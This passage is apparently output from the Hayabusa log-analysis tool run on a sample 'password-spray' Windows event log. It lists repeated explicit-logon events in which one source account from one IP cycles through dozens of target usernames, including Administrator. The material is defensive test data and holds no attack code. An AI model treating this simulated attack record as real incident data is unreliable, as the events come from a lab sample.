Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : 